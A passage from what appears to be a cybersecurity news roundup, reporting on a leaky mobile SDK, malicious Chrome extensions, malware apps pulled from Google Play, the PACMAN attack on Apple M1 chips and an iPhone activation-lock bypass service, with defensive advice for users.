  • Downloading or uploading assets and resources needed for the applications, generally large media files, images, or recordings. 
  • To access configuration files for the app and/or register the device or get device info for cloud storage. 
  • Access cloud services that need authentication, like translation services.
  • For no particular reason, the dead code was used for testing and never removed. 

In one incident discovered by Symantec, an unknown B2B company that offers an intranet and communication platform and also provides a mobile software development kit (SDK) to its customers had its cloud infrastructure keys embedded in the SDK to access the translation service. 

It led to the leak of all of its customers' personal information- corporate data and financial records that belonged to more than 15000 medium to large-sized firms. 

How can users stay safe from supply chain attacks?

It is possible to protect yourself from supply chain issues, one can add security scanning solutions to the app development lifecycle and if using an outsourced provider, you can review Mobile App Report Cards, which can notice any malicious app behaviors or vulnerabilities for every launch of the mobile app, can all be helpful in to highlight potential issues. 

If you're an app developer, you can look for a report card that both scans SDKs and frameworks in your apps and finds the source of any vulnerabilities or suspicious behaviors. 

Malicious Chrome Extensions Siphoning Data from 1.4 million Users


Threat analysts at McAfee unearthed five malicious Chrome extensions manufactured to track user's browsing activity and deploy code into e-commerce websites. 

With over 1.4 million installs, the malicious extensions can alter cookies on e-commerce platforms without the victim’s knowledge so that scammers can receive affiliate payments for the purchased products. The five malicious extensions that exploit affiliate marketing are as follows: 

• Netflix Party (800,000 downloads), 
• Netflix Party 2 (300,000), 
• Full Page Screenshot Capture (200,000), 
• FlipShope Price Tracker Extension (80,000), 
• AutoBuy Flash Sales (20,000). 

"The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website," McAfee researchers Oliver Devane and Vallabh Chole explained. "The latter borrows several phrases from another popular extension called GoFullPage."

All five extensions employ an identical methodology to target users. The web app manifest ("manifest.json" file), responsible for managing the extension behavior on the victim’s system, loads a multifunctional script (B0.js) that sends the browsing data to a domain the hackers' control (“langhort[.]com”). 

The data is deployed via POST requests each time the victim visits a new URL. The stolen data includes the URL in base64 form, the user ID, device location (country, city, zip code), and an encoded referral URL. The researchers also disclosed that the user tracking and code injection behavior resides in a script named ‘b0.js’, which contains many other functions as well. 

Additionally, the security firm identified the evasive mechanism that delays the malicious activity by 15 days from the time of installation of the extension to help keep its activity concerted and avoid raising red flags. 

McAfee recommends users extensively check extensions before installing them, even if they already have a large install base, and to pay close attention to the permissions the extensions ask for, such as the permission to run on any website the user visits. 

Last month, security researchers at Kaspersky estimated that more than 1.3 million users have been impacted by malicious browser extensions in just the first six months of this year alone. In fact, from January 2020 to June 2022, researchers unearthed that more than 4.3 million users had adware concealed in their browser extensions. Although Google is working rigorously to eliminate malicious extensions, new ones continue to pop up at a rapid pace.

Google Removes Several Apps From Play Store Distributing Malware


Earlier this week, Google blocked dozens of malicious Android apps from the official Play Store that were propagating Joker, Facestealer, and Coper malware families via the virtual marketplace. 

According to the findings from Zscaler ThreatLabz and Pradeo researchers, the Joker spyware exfiltrated SMS messages, contact lists, and device information and lured victims to sign up for premium service subscriptions. 

A total of 54 Joker downloader apps were unearthed by the two cybersecurity firms, with the apps installed cumulatively over 330,000 times. Nearly half of the apps belonged to communication (47.1%) category followed by tools (39.2%), personalization (5.9%), health and, photography. 

“The tools and communication were among the most targeted categories covering the majority of the Joker-infected apps. ThreatLabz discovered daily uploads of apps containing the Joker malware indicating the high activity level and persistence of the adversary group.” reads the blog post published by Zscaler. “Consistent with previous findings, ThreatLabz's latest discoveries belonging to the Joker malware campaign continue to follow similar developer naming patterns and use of familiar techniques.” 

ThreatLabz experts also uncovered multiple apps compromised with the Facestealer and Coper malware. 

The Facestealer spyware was first unearthed in July last year by Dr. Web researchers, and was designed to steal Facebook users’ logins and passwords and authentication tokens. 

The Coper malware is a banking trojan that targets banking applications in Europe, Australia, and South America. The hackers distribute the apps by disguising them as legitimate apps in the Google Play Store. 

“Once downloaded, this app unleashes the Coper malware infection which is capable of intercepting and sending SMS text messages, making USSD (Unstructured Supplementary Service Data) requests to send messages, keylogging, locking/unlocking the device screen, performing overly attacks, preventing uninstalls and generally allowing attackers to take control and execute commands on infected device via remote connection with a C2 server.” continues the report. 

The researchers recommended users to refrain from granting unnecessary permissions to apps and verify their authenticity by checking for developer information, reading reviews, and scrutinizing their privacy policies. If you become a victim of a malicious app from the Play Store, inform Google about it immediately through the support options in your play Store app.

Security Bug Detected in Apple M1 Processor Chipsets


MIT researchers have unearthed an “unpatchable” hardware bug in Apple's M1 processor chipsets that could allow hackers to breach its last line of security defenses. 

The security loophole is rooted in a hardware-level security mechanism employed in Apple M1 chips called pointer authentication codes, or PAC. This mechanism restricts a hacker to inject malicious code into a device’s memory and it also shields against buffer overflow exploits, which is a form of assault that forces memory to leak into other locations of the chip and acts as the last line of defense.

Employing assault to identify vulnerability 

MIT researchers demonstrated a novel hardware assault dubbed PACMAN that combines memory corruption and speculative execution to bypass the security feature. The assault depicted that pointer authentication can be breached without leaving a trace, and as it employs a hardware mechanism that cannot be patched with software features. 

The attack works by “guessing” a pointer authentication code (PAC), a cryptographic signature that confirms that an app hasn’t been maliciously altered. This is done using speculative execution — a methodology employed by modern computer processors to enhance performance by speculatively guessing various lines of computation — to leak PAC verification results, while a hardware side-channel reveals whether or not the guess was correct.

According to the researchers, there are many possible values of a PAC, but with a device that reveals whether a guess is correct or false, one can try them all until they hit the right one. 

“The idea behind pointer authentication is that if all else has failed, you still can rely on it to prevent attackers from gaining control of your system. We’ve shown that pointer authentication as a last line of defense isn’t as absolute as we once thought it was,” explained MIT CSAIL Ph.D. student Joseph Ravichandran and co-lead author of the paper. 

“When pointer authentication was introduced, a whole category of bugs suddenly became a lot harder to use for attacks. With PACMAN making these bugs more serious, the overall attack surface could be a lot larger”. 

Multiple chipsets are in danger 

Apple uses PAC on all its M1 chips, including the M1, M1 Pro, and M1 Max. In the coming months, other chip designers, including Samsung along with Qualcomm, are expected to launch new chips supporting PAC. 

If this exploit is not mitigated, it will impact the majority of mobile devices, and likely even desktop devices in the coming years, researchers warned. 

Prevention tips 

To mitigate the risks, modification of the software is required so PAC verification results are never done under speculation, meaning a hacker couldn’t go incognito while attempting to breach. 

The second technique is to guard against PACMAN in the same way Spectre vulnerabilities are being mitigated. And finally, patching memory corruption bugs would ensure this last line of defense isn’t required.

Attackers Use Underground Hacking Forum to Strip Activation Lock from iPhones, an underground hacking forum is offering users a convenient way to strip ‘activation lock’ from iPhones with its pay-for-hacking service. However, iOS security analysts believe the hackers are tricking people to remove protections from stolen iPhones. 

Activation lock essentially prohibits anyone from activating the device until the owner enters the requested credentials. The lock is enabled when the administrator sets up Find My, the Apple service that allows people to track the location of their iPhone, Mac, or Apple Watch. 

“Activation Lock,” a text popup across the iPhone’s screen read. “This iPhone is linked to an Apple ID. Enter the Apple ID and password that were used to set up this iPhone.” 

The hackers are using checkra1n, an open-source jailbreaking tool published in 2019. Checkra1n employs an exploit called checkm8 designed by the developer known as Axi0mX. According to’s website, Checkm8 is only applicable for devices running iOS versions 12 to 14.8.1 because the latest iPhones have updated bootrom code that is not susceptible to checkm8. 

A video posted on’s website shows how smoothly the process of using the tool is. A user only needs to download the software, install it, open it up, and finally plug it into Mac or PC. Subsequently, the site charges $69.99 per license. 

“Done! You have successfully bypassed the iCloud activation lock on your device,” the video’s female narrator explains. 

Additionally, provides a service called “Bypass iPhone Passcode.” This service tool is not identical to established iPhone unlocking services such as Cellebrite and GrayShift. “This service restores the device to factory settings and activates it as a new device using a saved activation ticket from the system. So basically, this method has nothing with brute-forcing or user data leak. Passcode phrase is a common name used by other tools for this service so we decided to give it the same name,” the administrator explained. 

Three years ago in 2019, security researcher axi0mX uncovered checkm8, an exploit that enabled the jailbreak of millions of iOS devices. The exploit lay in the bootrom of the compromised devices. Before 2019, the last iOS bootrom-based jailbreak was published way back in 2009, making the Checkm8 exploit even more astonishing feet since many believed the hardware avenue for rooting devices had long been shut down closed.